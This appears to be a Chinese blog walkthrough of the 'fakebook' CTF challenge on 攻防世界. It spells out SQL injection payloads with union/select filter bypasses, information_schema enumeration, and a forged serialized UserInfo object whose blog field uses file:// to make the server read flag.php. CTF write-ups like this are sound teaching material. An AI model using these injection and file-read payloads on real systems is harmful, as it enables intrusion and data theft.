当前位置：首页 > news >正文

fakebook-攻防世界

news 2026/5/19 21:07:27

题目

先目录扫描一下

dirseach

打开flag.php是空白的

访问robots.txt,访问user.php.bak

<?php

class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";

public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}

function get($url)
{
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);

return $output;
}

public function getBlogContents ()
{
return $this->get($this->blog);
}

public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}

}

但是好像没用

正常注册一下

这里发现有no=1试一试sql注入

加个'报错可能存在注入

1 and 1=1 正常

1 and 1=2 报错

1' and 1=1 --+报错

1' and 1=2 --+报错

确定是数字型注入

爆字段1 order by 4正常

1 order by 5报错，确定字段是4

爆显位

1 union select 1,2,3,4

但是被过滤了

SQL注入一些过滤及绕过总结_sql注入过滤-CSDN博客

union 和select被前端过滤了，用unicode和<>绕过过滤是不可行的，只有/**/union /**/select可以绕过：

view.php?no=2 UniOn select 1,2,3,4#
view.php?no=2 union SelEct 1,2,3,4#
view.php?no=2 uunionnion selselectect 1,2,3,4#

view.php?no=2 union/**/select 1,2,3,4#
view.php?no=2 union++select 1,2,3,4#

no=-1 /**/union /**/select 1,2,3,4

说明显位是2

爆库名

view.php?no=2 union++select 1,user(),3,4#
view.php?no=2 union++select 1,database(),3,4#

-1 /**/union /**/select 1,group_conact(schema_name),3,4 from information_schema.schemata

爆表名

-1 /**/union /**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"

爆字段

-1 /**/union /**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema="fakebook"

爆数据

-1 /**/union /**/select 1,group_concat(data),3,4 from fakebook.users

发现是我们注册时被序列化的数据

O:8:"UserInfo":3:{s:4:"name";s:5:"20_aw";s:3:"age";i:20;s:4:"blog";s:10:"www.aw.com";}

得到一个现成的序列化数据我们能否模仿

通过之前查的数据username是字段2，猜测data是字段4按顺序来嘛

no=2 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"20_aw";s:3:"age";i:20;s:4:"blog";s:10:"www.aw.com";} '

页面正常起来了

注意no现在的值为2，我们知道这个用户是不存在的。换而言之，原SQL语句的查询结果为空，而我们通过union加入了我们构造的查询语句，让SQL语句有了查询结果，并且此查询结果符合页面渲染要求，所以页面正常显示了。

并且由此得知，只要有data字段的对象序列，就可以成功渲染页面，其他字段并不是很重要。（页面中age和blog的值，显然也都是从序列化的对象里面得到的）

利用php伪协议读取，flag文件嘛

修改序列化中的blog参数,路径之前报错算是提示吧，而且一般都是默认路径

s:4:"blog";s:29:"file:///var/www/html/flag.php";

no=2 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"20_aw";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";} '

打开源代码中发现

点击

fakebook-攻防世界

相关文章：

fakebook-攻防世界

mynet开源库

深度挖掘商品信息，jd.item_get API助您呈现商品全面规格参数

A Random Walk Based Anonymous Peer-to-Peer

php代码执行计划任务dos实现方式和宝塔面板实现方式

千万不要错过这6款能让你快速写作成长的宝藏软件…… #学习方法#AI写作

TypeScript系列之-理解TypeScript类型系统画图讲解

制造业智能化一体式I/O模块的集成与应用案例分享

《云原生安全攻防》-- 云原生应用风险分析

抖音-引流私域转化模式1.0现场视频，从抖音源源不断把人加到私域，

外包干了6天，技术明显进步

上传应用程序到苹果应用商店的工具和要

vue：判断当前日期时间是否在一个日期时间区间里

浏览器禁用cookie后session还能用吗？

C语言——顺序表

CentOS7安装Docker及禅道

如何在社交媒体中使用增强现实来提高客户参与度？

Autodesk AutoCAD 2025 (macOS, Windows) - 自动计算机辅助设计软件

买卖股票的最佳时机III

fastlio2 保存每帧的点云和每帧的里程计为单独的文件做后端回环优化和手动回环优化

从Hive Metastore到HiveServer2：手把手教你配置生产级远程访问服务

QGIS背景图层全攻略：从在线电子地图到本地DEM，打造专业级GIS底图（以南京为例）

2025最新版PHP加密系统MENC加密系统 V2.4.0 含搭建教程

RK3566安卓11开发板千兆网卡RTL8211F移植避坑指南：从原理图到DTS配置全流程

如何用Element React构建企业级React应用：完整组件库实战指南

如何在Windows上完美使用苹果触控板：终极配置指南

长期使用聚合API平台，对账单清晰度与费用追溯的满意度反馈

初次接触Taotoken从注册到发出第一个API请求的全流程耗时

Autoswagger与Intruder生态集成：企业级API安全解决方案的完整指南

深入SmoothL1Loss：从Faster R-CNN到YOLO，看一个损失函数如何影响模型精度